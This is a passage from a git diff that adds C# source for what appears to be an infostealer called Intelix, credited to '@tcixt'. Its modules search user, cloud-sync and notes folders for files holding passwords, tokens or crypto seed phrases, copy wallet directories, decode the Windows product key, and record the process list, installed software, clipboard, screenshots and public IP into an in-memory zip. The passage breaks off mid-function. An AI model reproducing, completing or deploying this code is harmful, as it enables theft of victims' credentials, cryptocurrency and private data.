Path.Combine(text, "wallets"); + if (Directory.Exists(text2)) + { + zip.AddDirectoryFiles(text2, sWalletRegistry); + counter.CryptoDesktop.Add(text2 + " => " + sWalletRegistry); + } + } + } + catch + { + } + } +} diff --git a/New/Intelix.Targets.Crypto/Grabber.cs b/New/Intelix.Targets.Crypto/Grabber.cs new file mode 100644 index 0000000..19e8cbe --- /dev/null +++ b/New/Intelix.Targets.Crypto/Grabber.cs @@ -0,0 +1,162 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text.RegularExpressions; +using System.Threading; +using System.Threading.Tasks; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Crypto; + +public class Grabber : ITarget +{ + private readonly long _sizeMinFile = 120L; + + private readonly long _sizeLimitFile = 6144L; + + private readonly long _sizeLimit = 5242880L; + + private long _size; + + private readonly Regex _seedRegex = new Regex("^(?:\\s*\\b[a-z]{3,}\\b){12,24}\\s*$", RegexOptions.IgnoreCase | RegexOptions.Multiline | RegexOptions.Compiled); + + private readonly string[] _blacklist = new string[10] { "license", "readme", "changelog", "about", "terms", "eula", "notice", "example", "sample", "test" }; + + private readonly string[] _keywords = new string[35] + { + "password", "passwd", "pwd", "pass", "login", "user", "username", "account", "mail", "email", + "secret", "key", "private", "public", "wallet", "mnemonic", "seed", "recovery", "phrase", "backup", + "pin", "auth", "2fa", "token", "apikey", "api_key", "ssh", "cert", "certificate", "crypto", + "btc", "eth", "usdt", "ltc", "xmr" + }; + + private readonly string[] _seedExtensions = new string[9] { ".seed", ".seedphrase", ".mnemonic", ".phrase", ".key", ".secret", ".txt", ".backup", ".wallet" }; + + private readonly string[] _seedPaths = new string[19] + { + Environment.GetFolderPath(Environment.SpecialFolder.Personal), + Environment.GetFolderPath(Environment.SpecialFolder.Desktop), + Environment.GetFolderPath(Environment.SpecialFolder.Personal), + Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments), + Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory), + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Downloads", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\OneDrive", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Dropbox", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\iCloudDrive", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Google Drive", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\YandexDisk", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Mega", + Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Evernote", + Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Standard Notes", + Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Joplin", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Wallets", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Keys", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Crypto", + Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\Backup" + }; + + private long Size + { + get + { + return Interlocked.Read(ref _size); + } + set + { + Interlocked.Exchange(ref _size, value); + } + } + + public void Collect(InMemoryZip zip, Counter counter) + { + Parallel.ForEach(_seedPaths, delegate(string directory) + { + SearchFiles(zip, counter, directory); + }); + } + + private void SearchFiles(InMemoryZip zip, Counter counter, string directory) + { + if (Size > _sizeLimit) + { + return; + } + try + { + Parallel.ForEach(Directory.GetDirectories(directory), delegate(string subDir) + { + if (Size <= _sizeLimit) + { + SearchFiles(zip, counter, subDir); + } + }); + } + catch + { + } + try + { + Parallel.ForEach(Directory.GetFiles(directory), delegate(string file) + { + if (Size <= _sizeLimit) + { + FileInfo fileInfo = new FileInfo(file); + if (_seedExtensions.Contains(fileInfo.Extension, StringComparer.OrdinalIgnoreCase) && fileInfo.Length < _sizeLimitFile && fileInfo.Length > _sizeMinFile) + { + string text = File.ReadAllText(fileInfo.FullName); + if (ContainsKeyword(fileInfo.Name) || ContainsKeyword(text) || ContainsSeedPhrase(text)) + { + Size += fileInfo.Length; + string text2 = "Files\\" + fileInfo.Name + RandomStrings.GenerateHashTag() + fileInfo.Extension; + zip.AddTextFile(text2, text); + counter.FilesGrabber.Add(file + " => " + text2); + } + } + } + }); + } + catch + { + } + } + + private bool ContainsSeedPhrase(string content) + { + return _seedRegex.IsMatch(content); + } + + private bool ContainsKeyword(string content) + { + if (string.IsNullOrEmpty(content)) + { + return false; + } + string[] source = content.Split(new char[14] + { + ' ', '\t', '\r', '\n', ',', '.', ';', ':', '-', '_', + '/', '\\', '"', '\'' + }, StringSplitOptions.RemoveEmptyEntries); + HashSet whitelist = new HashSet(_keywords, StringComparer.OrdinalIgnoreCase); + HashSet blacklist = new HashSet(_blacklist, StringComparer.OrdinalIgnoreCase); + int result = 0; + Parallel.ForEach(source, delegate(string word, ParallelLoopState state) + { + if (Volatile.Read(ref result) == -1) + { + state.Stop(); + } + else if (blacklist.Contains(word)) + { + Interlocked.Exchange(ref result, -1); + state.Stop(); + } + else if (whitelist.Contains(word)) + { + Interlocked.CompareExchange(ref result, 1, 0); + } + }); + return result == 1; + } +} diff --git a/New/Intelix.Targets.Device/._GameList.cs b/New/Intelix.Targets.Device/._GameList.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._GameList.cs differ diff --git a/New/Intelix.Targets.Device/._InstalledBrowsers.cs b/New/Intelix.Targets.Device/._InstalledBrowsers.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._InstalledBrowsers.cs differ diff --git a/New/Intelix.Targets.Device/._InstalledPrograms.cs b/New/Intelix.Targets.Device/._InstalledPrograms.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._InstalledPrograms.cs differ diff --git a/New/Intelix.Targets.Device/._ProcessDump.cs b/New/Intelix.Targets.Device/._ProcessDump.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._ProcessDump.cs differ diff --git a/New/Intelix.Targets.Device/._ProductKey.cs b/New/Intelix.Targets.Device/._ProductKey.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._ProductKey.cs differ diff --git a/New/Intelix.Targets.Device/._ScreenShot.cs b/New/Intelix.Targets.Device/._ScreenShot.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._ScreenShot.cs differ diff --git a/New/Intelix.Targets.Device/._SystemInfo.cs b/New/Intelix.Targets.Device/._SystemInfo.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._SystemInfo.cs differ diff --git a/New/Intelix.Targets.Device/._WifiKey.cs b/New/Intelix.Targets.Device/._WifiKey.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Device/._WifiKey.cs differ diff --git a/New/Intelix.Targets.Device/GameList.cs b/New/Intelix.Targets.Device/GameList.cs new file mode 100644 index 0000000..9c4b9cd --- /dev/null +++ b/New/Intelix.Targets.Device/GameList.cs @@ -0,0 +1,22 @@ +using System.Collections.Generic; +using System.IO; +using System.Linq; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Device; + +public class GameList : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = "C:\\Games"; + if (Directory.Exists(path)) + { + List list = Directory.GetDirectories(path).Select(Path.GetFileName).ToList(); + if (list.Any()) + { + zip.AddTextFile("Games.txt", string.Join("\n", list)); + } + } + } +} diff --git a/New/Intelix.Targets.Device/InstalledBrowsers.cs b/New/Intelix.Targets.Device/InstalledBrowsers.cs new file mode 100644 index 0000000..e791c04 --- /dev/null +++ b/New/Intelix.Targets.Device/InstalledBrowsers.cs @@ -0,0 +1,160 @@ +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Device; + +public class InstalledBrowsers : ITarget +{ + private class Browser + { + public string Name { get; set; } + + public string Path { get; set; } + + public string Version { get; set; } + } + + public void Collect(InMemoryZip zip, Counter counter) + { + List list = (from g in GetBrowsers().GroupBy((Browser b) => b.Name, StringComparer.OrdinalIgnoreCase) + select g.First()).ToList(); + int maxName = Math.Max("Name".Length, list.Max((Browser b) => b.Name.Length)); + int maxVersion = Math.Max("Version".Length, list.Max((Browser b) => b.Version.Length)); + int length = "In Use".Length; + List list2 = new List + { + "Name".PadRight(maxName) + " | " + "Version".PadRight(maxVersion), + new string('-', maxName + maxVersion + length + 6) + }; + list2.AddRange(list.Select(delegate(Browser b) + { + SafeGetExeName(b.Path); + return b.Name.PadRight(maxName) + " | " + b.Version.PadRight(maxVersion); + })); + if (list.Count > 0) + { + zip.AddTextFile("InstalledBrowsers.txt", string.Join("\n", list2)); + } + } + + private static IEnumerable GetBrowsers() + { + string[] obj = new string[2] { "SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet", "SOFTWARE\\Clients\\StartMenuInternet" }; + List list = new List(); + string[] array = obj; + foreach (string keyPath in array) + { + list.AddRange(GetBrowsersFromRegistry(keyPath, Registry.LocalMachine)); + list.AddRange(GetBrowsersFromRegistry(keyPath, Registry.CurrentUser)); + } + Browser edgeLegacyVersion = GetEdgeLegacyVersion(); + if (edgeLegacyVersion != null) + { + list.Add(edgeLegacyVersion); + } + return list; + } + + private static IEnumerable GetBrowsersFromRegistry(string keyPath, RegistryKey root) + { + using RegistryKey key = root.OpenSubKey(keyPath); + if (key == null) + { + yield break; + } + string[] subKeyNames = key.GetSubKeyNames(); + foreach (string name in subKeyNames) + { + using RegistryKey subkey = key.OpenSubKey(name); + if (!(subkey?.GetValue(null) is string name2)) + { + continue; + } + string text = StripQuotesFromCommand(subkey.OpenSubKey("shell\\open\\command")?.GetValue(null)?.ToString()); + string version = "unknown"; + if (!string.IsNullOrEmpty(text) && File.Exists(text)) + { + try + { + version = FileVersionInfo.GetVersionInfo(text).FileVersion; + } + catch + { + } + } + yield return new Browser + { + Name = name2, + Path = text, + Version = version + }; + } + } + + private static Browser GetEdgeLegacyVersion() + { + using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Schemas")) + { + if (registryKey?.GetValue("PackageFullName") is string input) + { + Match match = Regex.Match(input, "\\d+(\\.\\d+)+"); + if (match.Success) + { + return new Browser + { + Name = "Microsoft Edge (Legacy)", + Path = null, + Version = match.Value + }; + } + } + } + return null; + } + + private static string StripQuotesFromCommand(string command) + { + if (string.IsNullOrWhiteSpace(command)) + { + return null; + } + command = command.Trim(); + if (command.StartsWith("\"")) + { + int num = command.IndexOf('"', 1); + if (num > 1) + { + return command.Substring(1, num - 1); + } + return null; + } + int num2 = command.IndexOf(' '); + if (num2 <= 0) + { + return command; + } + return command.Substring(0, num2); + } + + private static string SafeGetExeName(string path) + { + try + { + if (string.IsNullOrWhiteSpace(path)) + { + return null; + } + return Path.GetFileName(path)?.ToUpperInvariant(); + } + catch + { + return null; + } + } +} diff --git a/New/Intelix.Targets.Device/InstalledPrograms.cs b/New/Intelix.Targets.Device/InstalledPrograms.cs new file mode 100644 index 0000000..abdbb71 --- /dev/null +++ b/New/Intelix.Targets.Device/InstalledPrograms.cs @@ -0,0 +1,77 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.Linq; +using System.Threading.Tasks; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Device; + +public class InstalledPrograms : ITarget +{ + private class InstalledProgram + { + public string Name { get; set; } + + public string Version { get; set; } + + public string InstallLocation { get; set; } + } + + public void Collect(InMemoryZip zip, Counter counter) + { + List list = new string[2] { "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall" }.SelectMany((string key) => GetInstalledPrograms(key, Registry.LocalMachine, counter).Concat(GetInstalledPrograms(key, Registry.CurrentUser, counter))).ToList(); + if (list.Count != 0) + { + int maxName = Math.Max("Name".Length, list.Max((InstalledProgram p) => p.Name?.Length ?? 0)); + int maxVersion = Math.Max("Version".Length, list.Max((InstalledProgram p) => p.Version?.Length ?? 0)); + int maxPath = Math.Max("Path".Length, list.Max((InstalledProgram p) => p.InstallLocation?.Length ?? 0)); + List list2 = new List(); + list2.Add("Name".PadRight(maxName) + " | " + "Path".PadRight(maxPath) + " | " + "Version".PadRight(maxVersion)); + list2.Add(new string('-', maxName + maxPath + maxVersion + 6)); + List list3 = list2; + list3.AddRange(list.Select((InstalledProgram p) => (p.Name ?? "Unknown").PadRight(maxName) + " | " + (p.InstallLocation ?? "Unknown").PadRight(maxPath) + " | " + (p.Version ?? "Unknown").PadRight(maxVersion))); + zip.AddTextFile("InstalledPrograms.txt", string.Join("\n", list3)); + } + } + + private static List GetInstalledPrograms(string uninstallKey, RegistryKey root, Counter counter) + { + ConcurrentBag installedPrograms = new ConcurrentBag(); + using (RegistryKey registryKey = root.OpenSubKey(uninstallKey)) + { + if (registryKey == null) + { + return new List(); + } + string[] subKeyNames = registryKey.GetSubKeyNames(); + if (subKeyNames == null || subKeyNames.Length == 0) + { + return new List(); + } + Parallel.ForEach(subKeyNames, delegate(string subkeyName) + { + try + { + using RegistryKey registryKey2 = root.OpenSubKey(uninstallKey + "\\" + subkeyName); + string text = registryKey2?.GetValue("DisplayName") as string; + if (!string.IsNullOrEmpty(text)) + { + InstalledProgram item = new InstalledProgram + { + Name = text.Trim(), + Version = ((registryKey2.GetValue("DisplayVersion") as string) ?? "Unknown"), + InstallLocation = ((registryKey2.GetValue("InstallLocation") as string) ?? "Unknown") + }; + installedPrograms.Add(item); + } + } + catch + { + } + }); + } + return installedPrograms.ToList(); + } +} diff --git a/New/Intelix.Targets.Device/ProcessDump.cs b/New/Intelix.Targets.Device/ProcessDump.cs new file mode 100644 index 0000000..44528f9 --- /dev/null +++ b/New/Intelix.Targets.Device/ProcessDump.cs @@ -0,0 +1,43 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Device; + +public class ProcessDump : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + try + { + List list = ProcessWindows.GetProcInfos().ToList(); + if (list.Count == 0) + { + return; + } + int totalWidth = Math.Max("Name".Length, list.Max((ProcessWindows.ProcInfo p) => p.Name?.Length ?? 0)); + int totalWidth2 = Math.Max("PID".Length, list.Max((ProcessWindows.ProcInfo p) => p.Pid?.Length ?? 0)); + int totalWidth3 = Math.Max("Path".Length, list.Max((ProcessWindows.ProcInfo p) => p.Path?.Length ?? 0)); + int totalWidth4 = Math.Max("Mem".Length, list.Max((ProcessWindows.ProcInfo p) => p.Memory?.Length ?? 0)); + string text = "Name".PadRight(totalWidth) + " | " + "PID".PadRight(totalWidth2) + " | " + "Path".PadRight(totalWidth3) + " | " + "Mem".PadRight(totalWidth4); + string value = new string('-', text.Length); + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine(text); + stringBuilder.AppendLine(value); + int result; + foreach (ProcessWindows.ProcInfo item in from x in list + orderby x.Name ?? string.Empty, (!int.TryParse(x.Pid, out result)) ? int.MaxValue : result + select x) + { + stringBuilder.AppendLine((item.Name ?? "Unknown").PadRight(totalWidth) + " | " + (item.Pid ?? "Unknown").PadRight(totalWidth2) + " | " + (item.Path ?? "Unknown").PadRight(totalWidth3) + " | " + (item.Memory ?? "Unknown").PadRight(totalWidth4)); + } + zip.AddTextFile("ProcessList.txt", stringBuilder.ToString()); + } + catch + { + } + } +} diff --git a/New/Intelix.Targets.Device/ProductKey.cs b/New/Intelix.Targets.Device/ProductKey.cs new file mode 100644 index 0000000..6ba6670 --- /dev/null +++ b/New/Intelix.Targets.Device/ProductKey.cs @@ -0,0 +1,135 @@ +using System; +using System.Collections; +using System.Text; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Device; + +public class ProductKey : ITarget +{ + private enum DigitalProductIdVersion + { + UpToWindows7, + Windows8AndUp + } + + public void Collect(InMemoryZip zip, Counter counter) + { + try + { + RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, Environment.Is64BitOperatingSystem ? RegistryView.Registry64 : RegistryView.Registry32); + object obj = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion")?.GetValue("DigitalProductId"); + if (obj != null) + { + byte[] digitalProductId = (byte[])obj; + registryKey.Close(); + bool flag = (Environment.OSVersion.Version.Major == 6 && Environment.OSVersion.Version.Minor >= 2) || Environment.OSVersion.Version.Major > 6; + string windowsProductKeyFromDigitalProductId = GetWindowsProductKeyFromDigitalProductId(digitalProductId, flag ? DigitalProductIdVersion.Windows8AndUp : DigitalProductIdVersion.UpToWindows7); + if (!string.IsNullOrEmpty(windowsProductKeyFromDigitalProductId)) + { + string text = (IsWindowsActivatedFast() ? "Activated ✅" : "Not Activated ❌"); + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("=== Windows Product Key Info ==="); + stringBuilder.AppendLine("Status : " + text); + stringBuilder.AppendLine("Key : " + windowsProductKeyFromDigitalProductId); + stringBuilder.AppendLine("================================"); + zip.AddTextFile("ProductKey.txt", stringBuilder.ToString()); + } + } + } + catch + { + } + } + + private string DecodeProductKeyWin8AndUp(byte[] digitalProductId) + { + string text = string.Empty; + byte b = (byte)((digitalProductId[66] / 6) & 1); + digitalProductId[66] = (byte)((digitalProductId[66] & 0xF7) | ((b & 2) * 4)); + int num = 0; + for (int num2 = 24; num2 >= 0; num2--) + { + int num3 = 0; + for (int num4 = 14; num4 >= 0; num4--) + { + num3 *= 256; + num3 = digitalProductId[num4 + 52] + num3; + digitalProductId[num4 + 52] = (byte)(num3 / 24); + num3 %= 24; + num = num3; + } + text = "BCDFGHJKMPQRTVWXY2346789"[num3] + text; + } + string text2 = text.Substring(1, num); + string text3 = text.Substring(num + 1, text.Length - (num + 1)); + text = text2 + "N" + text3; + for (int i = 5; i < text.Length; i += 6) + { + text = text.Insert(i, "-"); + } + return text; + } + + private string DecodeProductKey(byte[] digitalProductId) + { + char[] array = new char[24] + { + 'B', 'C', 'D', 'F', 'G', 'H', 'J', 'K', 'M', 'P', + 'Q', 'R', 'T', 'V', 'W', 'X', 'Y', '2', '3', '4', + '6', '7', '8', '9' + }; + char[] array2 = new char[29]; + ArrayList arrayList = new ArrayList(); + for (int i = 52; i <= 67; i++) + { + arrayList.Add(digitalProductId[i]); + } + for (int num = 28; num >= 0; num--) + { + if ((num + 1) % 6 == 0) + { + array2[num] = '-'; + } + else + { + int num2 = 0; + for (int num3 = 14; num3 >= 0; num3--) + { + int num4 = (num2 << 8) | (byte)arrayList[num3]; + arrayList[num3] = (byte)(num4 / 24); + num2 = num4 % 24; + array2[num] = array[num2]; + } + } + } + return new string(array2); + } + + private string GetWindowsProductKeyFromDigitalProductId(byte[] digitalProductId, DigitalProductIdVersion digitalProductIdVersion) + { + if (digitalProductIdVersion != DigitalProductIdVersion.Windows8AndUp) + { + return DecodeProductKey(digitalProductId); + } + return DecodeProductKeyWin8AndUp(digitalProductId); + } + + public static bool IsWindowsActivatedFast() + { + try + { + using RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform"); + if (registryKey != null) + { + object value = registryKey.GetValue("BackupProductKeyDefault"); + return value != null && value.ToString().Length > 0; + } + } + catch + { + } + return false; + } +} diff --git a/New/Intelix.Targets.Device/ScreenShot.cs b/New/Intelix.Targets.Device/ScreenShot.cs new file mode 100644 index 0000000..73cc066 --- /dev/null +++ b/New/Intelix.Targets.Device/ScreenShot.cs @@ -0,0 +1,177 @@ +using System; +using System.Diagnostics; +using System.Drawing; +using System.Drawing.Drawing2D; +using System.Drawing.Imaging; +using System.Drawing.Text; +using System.IO; +using System.Windows.Forms; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Device; + +public class ScreenShot : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Rectangle bounds = Screen.PrimaryScreen.Bounds; + using Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height, PixelFormat.Format24bppRgb); + using Graphics graphics = Graphics.FromImage(bitmap); + IntPtr hdc = graphics.GetHdc(); + IntPtr windowDC = NativeMethods.GetWindowDC(NativeMethods.GetDesktopWindow()); + NativeMethods.BitBlt(hdc, 0, 0, bounds.Width, bounds.Height, windowDC, 0, 0, 13369376); + graphics.ReleaseHdc(hdc); + NativeMethods.ReleaseDC(NativeMethods.GetDesktopWindow(), windowDC); + graphics.SmoothingMode = SmoothingMode.AntiAlias; + graphics.TextRenderingHint = TextRenderingHint.ClearTypeGridFit; + graphics.InterpolationMode = InterpolationMode.HighQualityBicubic; + RectangleF rectangleF = new RectangleF(0f, 0f, bounds.Width, bounds.Height); + StringFormat format = new StringFormat + { + Alignment = StringAlignment.Center, + LineAlignment = StringAlignment.Center + }; + float num = Math.Max(24f, (float)bounds.Width / 12f); + using (Font font = new Font("Segoe UI Black", num, FontStyle.Bold, GraphicsUnit.Pixel)) + { + using GraphicsPath graphicsPath = new GraphicsPath(); + graphicsPath.AddString("toxi", font.FontFamily, (int)font.Style, font.Size, rectangleF, format); + int num2 = 10; + for (int num3 = num2; num3 >= 1; num3--) + { + int alpha = (int)(30.0 * (1.0 - (double)num3 / (double)num2)) + 8; + using Pen pen = new Pen(width: num / 18f * (float)num3, color: Color.FromArgb(alpha, 120, 40, 200)); + pen.LineJoin = LineJoin.Round; + graphics.DrawPath(pen, graphicsPath); + } + using (LinearGradientBrush linearGradientBrush = new LinearGradientBrush(rectangleF, Color.FromArgb(255, 85, 0, 255), Color.FromArgb(255, 0, 220, 255), LinearGradientMode.Horizontal)) + { + ColorBlend colorBlend = new ColorBlend(); + colorBlend.Colors = new Color[4] + { + Color.FromArgb(255, 48, 0, 96), + Color.FromArgb(255, 102, 0, 204), + Color.FromArgb(255, 0, 150, 255), + Color.FromArgb(255, 0, 255, 180) + }; + colorBlend.Positions = new float[4] { 0f, 0.45f, 0.75f, 1f }; + linearGradientBrush.InterpolationColors = colorBlend; + using PathGradientBrush pathGradientBrush = new PathGradientBrush(graphicsPath); + pathGradientBrush.CenterColor = Color.FromArgb(220, 255, 255, 255); + pathGradientBrush.SurroundColors = new Color[1] { Color.FromArgb(0, 0, 0, 0) }; + pathGradientBrush.CenterPoint = new PointF(rectangleF.Width * 0.5f, rectangleF.Height * 0.45f); + graphics.FillPath(linearGradientBrush, graphicsPath); + graphics.FillPath(pathGradientBrush, graphicsPath); + } + using (Pen pen2 = new Pen(Color.FromArgb(220, 255, 255, 255), Math.Max(2f, num / 28f))) + { + pen2.LineJoin = LineJoin.Round; + graphics.DrawPath(pen2, graphicsPath); + } + PointF[] array = new PointF[5] + { + new PointF(rectangleF.Width * 0.22f, rectangleF.Height * 0.38f), + new PointF(rectangleF.Width * 0.33f, rectangleF.Height * 0.52f), + new PointF(rectangleF.Width * 0.68f, rectangleF.Height * 0.4f), + new PointF(rectangleF.Width * 0.6f, rectangleF.Height * 0.6f), + new PointF(rectangleF.Width * 0.5f, rectangleF.Height * 0.3f) + }; + for (int i = 0; i < array.Length; i++) + { + PointF pointF = array[i]; + float num4 = Math.Max(2f, num / 28f); + using (SolidBrush brush = new SolidBrush(Color.FromArgb(230, 255, 250, 200))) + { + graphics.FillEllipse(brush, pointF.X - num4 / 2f, pointF.Y - num4 / 2f, num4, num4); + } + using SolidBrush brush2 = new SolidBrush(Color.FromArgb(80, 150, 220, 255)); + graphics.FillEllipse(brush2, pointF.X - num4 * 2f, pointF.Y - num4 * 2f, num4 * 4f, num4 * 4f); + } + } + string fileName = Process.GetCurrentProcess().MainModule.FileName; + string[] array2 = new string[12] + { + "Machine: " + Environment.MachineName, + "User: " + Environment.UserName, + $"Time: {DateTimeOffset.Now:yyyy-MM-dd HH:mm:ss zzz}", + $".NET: {Environment.Version}", + "CPU: " + CpuInfo.GetName(), + $"CPU Cores: {CpuInfo.GetLogicalCores()}", + "OS Product: " + WindowsInfo.GetProductName(), + "OS Build: " + WindowsInfo.GetBuildNumber(), + "OS Arch: " + WindowsInfo.GetArchitecture(), + "Public ip: " + IpApi.GetPublicIp(), + "Build Name: " + Path.GetFileName(Path.GetDirectoryName(fileName)) + "\\" + Path.GetFileName(fileName), + "Code by @tcixt" + }; + float num5 = Math.Max(12f, (float)bounds.Width / 120f); + using (Font font2 = new Font("Segoe UI", num5, FontStyle.Regular, GraphicsUnit.Pixel)) + { + float num6 = Math.Max(8f, num5 * 0.6f); + float num7 = 0f; + float num8 = 0f; + string[] array3 = array2; + foreach (string text in array3) + { + SizeF sizeF = graphics.MeasureString(text, font2); + if (sizeF.Width > num7) + { + num7 = sizeF.Width; + } + if (sizeF.Height > num8) + { + num8 = sizeF.Height; + } + } + float width = num7 + num6 * 2f; + float num9 = (float)array2.Length * num8 + num6 * 2f; + RectangleF rect = new RectangleF(12f, (float)bounds.Height - num9 - 12f, width, num9); + using (SolidBrush brush3 = new SolidBrush(Color.FromArgb(180, 6, 6, 10))) + { + using Pen pen3 = new Pen(Color.FromArgb(220, 60, 60, 80), 1f); + graphics.FillRectangle(brush3, rect); + graphics.DrawRectangle(pen3, rect.X, rect.Y, rect.Width, rect.Height); + } + float num10 = rect.X + num6; + float num11 = rect.Y + num6; + using SolidBrush brush4 = new SolidBrush(Color.FromArgb(160, 0, 0, 0)); + using SolidBrush brush5 = new SolidBrush(Color.FromArgb(240, 245, 250, 255)); + array3 = array2; + foreach (string s in array3) + { + graphics.DrawString(s, font2, brush4, new PointF(num10 + 1f, num11 + 1f)); + graphics.DrawString(s, font2, brush5, new PointF(num10, num11)); + num11 += num8; + } + } + using MemoryStream memoryStream = new MemoryStream(); + ImageCodecInfo imageCodecInfo = null; + ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders(); + for (int j = 0; j < imageEncoders.Length; j++) + { + if (string.Equals(imageEncoders[j].MimeType, "image/jpeg", StringComparison.OrdinalIgnoreCase)) + { + imageCodecInfo = imageEncoders[j]; + break; + } + } + if (imageCodecInfo != null) + { + Encoder quality = Encoder.Quality; + EncoderParameters encoderParameters = new EncoderParameters(1); + encoderParameters.Param[0] = new EncoderParameter(quality, 90L); + bitmap.Save(memoryStream, imageCodecInfo, encoderParameters); + } + else + { + bitmap.Save(memoryStream, ImageFormat.Jpeg); + } + byte[] array4 = memoryStream.ToArray(); + if (array4 != null && array4.Length != 0) + { + string entryPath = "screenshot.jpg"; + zip.AddFile(entryPath, array4); + } + } +} diff --git a/New/Intelix.Targets.Device/SystemInfo.cs b/New/Intelix.Targets.Device/SystemInfo.cs new file mode 100644 index 0000000..077b5ce --- /dev/null +++ b/New/Intelix.Targets.Device/SystemInfo.cs @@ -0,0 +1,311 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Net.NetworkInformation; +using System.Net.Sockets; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; +using System.Threading.Tasks; +using System.Windows.Forms; +using Intelix.Helper; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Device; + +internal class SystemInfo : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + try + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("\r\n \r\n _____ _ \r\n|_ _|____ _(_)\r\n | |/ _ \\ \\/ / |\r\n | | (_) > <| |\r\n |_|\\___/_/\\_\\_|\r\n "); + stringBuilder.AppendLine(" Developer @tcixt"); + Task task = Task.Run(() => BuildUserSection()); + Task task2 = Task.Run(() => BuildNetworkSection()); + Task task3 = Task.Run(() => BuildSystemSection()); + Task task4 = Task.Run(() => BuildDrivesSection()); + Task task5 = Task.Run(() => BuildGpuSection()); + Task task6 = Task.Run(() => BuildBasicSection()); + Task.WaitAll(task, task2, task3, task4, task5, task6); + StringBuilder stringBuilder2 = new StringBuilder(); + stringBuilder2.Append(stringBuilder); + stringBuilder2.AppendLine(task.Result).AppendLine(); + stringBuilder2.AppendLine(task2.Result).AppendLine(); + stringBuilder2.AppendLine(task3.Result).AppendLine(); + stringBuilder2.AppendLine(task4.Result).AppendLine(); + stringBuilder2.AppendLine(task5.Result).AppendLine(); + stringBuilder2.AppendLine(task6.Result); + zip.AddTextFile("Information.txt", stringBuilder2.ToString()); + } + catch + { + } + } + + private static string BuildUserSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[User Info]"); + try + { + stringBuilder.AppendLine("User: " + Environment.UserName); + stringBuilder.AppendLine("Machine: " + Environment.MachineName); + stringBuilder.AppendLine($"Now: {DateTime.Now:yyyy-MM-dd HH:mm:ss}"); + } + catch + { + stringBuilder.AppendLine("User/System fields unavailable"); + } + try + { + string text = InputLanguage.CurrentInputLanguage?.Culture?.TwoLetterISOLanguageName ?? "unknown"; + stringBuilder.AppendLine("Input ISO: " + text); + } + catch + { + stringBuilder.AppendLine("Input ISO: unknown"); + } + stringBuilder.AppendLine("Hwid: " + HwidGenerator.GetHwid()); + stringBuilder.AppendLine("Clipboard: " + GetClipboardTextNoTimeout()); + return 